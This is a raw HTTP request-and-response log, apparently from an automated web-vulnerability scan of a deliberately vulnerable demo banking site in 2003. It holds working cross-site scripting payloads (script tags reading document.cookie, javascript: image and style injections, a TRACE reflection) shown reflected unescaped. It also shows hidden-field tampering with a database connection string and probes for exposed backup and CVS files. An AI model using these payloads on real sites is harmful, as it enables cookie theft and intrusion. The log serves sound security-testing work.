A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"'><img%20src="javascript:alert('XSS')">HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 973
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"'><img src="javascript:alert('XSS')"><br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= >"'><img src="javascript:alert('XSS')"><br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
GET /banklogin.asp?err=test@<script>alert(document.cookie)</script>.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:03 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4963
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>test@<script>alert(document.cookie)</script>.com<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=1"style="background:url(javascript:alert('XSS'))"%20"&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 400
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = 1"style="background:url(javascript:alert('XSS'))" "</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /plink.asp?a=test@<script>alert(document.cookie)</script>.com&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:50 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 214
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = test@<script>alert(document.cookie)</script>.com</P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /linking/link1/link2/link3/link4/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/index4.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:22 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:09 GMT
ETag: "ca360fda9dc11:8f6"
Content-Length: 37
<A HREF="./link5/index.htm">Link5</A>GET /scripts/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:26 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=test@<script>alert(document.cookie)</script>.comHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:14 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 991
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was test@<script>alert(document.cookie)</script>.com<br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= test@<script>alert(document.cookie)</script>.com<br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=>"><script>alert("XSS")</script>&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 348
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = >"><script>alert("XSS")</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /CVS/Entries HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:11 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 07 Jan 2002 20:34:28 GMT
ETag: "ccb36ab4ba97c11:8f6"
Content-Length: 1723
D/aolcom////
D/aolhome////
D/arribada////
D/au////
D/automotive////
D/buy////
D/Canada////
D/cdnow////
D/chinatown////
D/community////
D/cshome////
D/dchome////
D/fre////
D/gc////
D/ger////
D/givingguide////
D/help////
D/hollywood////
D/homepages////
D/icqhome////
D/included////
D/jp////
D/jpn////
D/la////
D/nchome////
D/powersellers////
D/redir////
D/regional////
D/search////
D/sell////
D/services////
D/spa////
D/support////
D/syipreview////
D/travolta////
D/UK////
D/unavailable////
D/US////
D/valvoline////
/coming-soon.html/1.3.2.3/Wed Aug 04 00:16:58 1999//Tcurrent
/empl-agreement.html/1.2.2.4/Wed Dec 01 23:06:12 1999//Tcurrent
/eq-verified-user-welcome.html/1.2.2.4/Wed Dec 01 23:06:13 1999//Tcurrent
/footer.html/1.1.2.7/Wed Mar 15 22:03:43 2000//Tcurrent
/header.html/1.3.2.12/Sun Feb 06 15:35:06 2000//Tcurrent
/itemview-link.html/1.2.2.4/Wed Mar 15 22:03:43 2000//Tcurrent
/jpbridge.html/1.1.2.2/Fri Feb 18 02:58:11 2000//Tcurrent
/outage-letter.html/1.1.2.6/Sun Feb 06 15:35:07 2000//Tcurrent
/pagetype.html/1.2/Tue Jun 08 18:34:21 1999//Tcurrent
/pay-coupon.html/1.1.2.2/Wed Dec 01 23:06:14 1999//Tcurrent
/powersellers.html/1.1.2.8/Wed Dec 01 23:06:14 1999//Tcurrent
/preview.html/1.1.2.5/Fri Mar 03 03:09:55 2000//Tcurrent
/stats.html/1.1.2.3/Wed Aug 04 00:17:00 1999//Tcurrent
/viewitem_bidbox.html/1.1.2.7/Wed Mar 15 22:03:44 2000//Tcurrent
/viewitem_end.html/1.1.2.6/Wed Mar 15 22:03:44 2000//Tcurrent
/welcome-july.html/1.1.2.1/Tue Aug 10 17:37:18 1999//Tcurrent
/welcome-new.html/1.3.2.12/Wed Aug 04 00:17:00 1999//Tcurrent
/welcome.html/1.1.2.13/Fri Oct 22 17:05:18 1999//Tcurrent
/sitemap.html/1.3.2.63/Mon Mar 27 18:55:48 2000//Tcurrent
TRACE /<script>alert('TRACE');</script> HTTP/1.1
Host: zero.webappsecurity.com
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 17:01:05 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 83
TRACE /<script>alert('TRACE');</script> HTTP/1.1
Host: zero.webappsecurity.com
GET /global.asa.bak HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:33:03 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:17 GMT
ETag: "60cb72c0a8dc11:8f6"
Content-Length: 241
<SCRIPT LANGUAGE=VBScript RUNAT=Server>
Sub Session_OnStart
Session("WildCard") = "%"
End Sub
sub Application_OnStart ' Runs once when the first page of your
application is run for the first time by any user
end sub
</SCRIPT>GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:32 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=>"'><img%20src="javascript:alert('XSS')">&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:57:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 388
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = >"'><img src="javascript:alert('XSS')"></P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=test@<script>alert(document.cookie)</script>.com&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=--><script>alert('XSS')</script>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:42 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
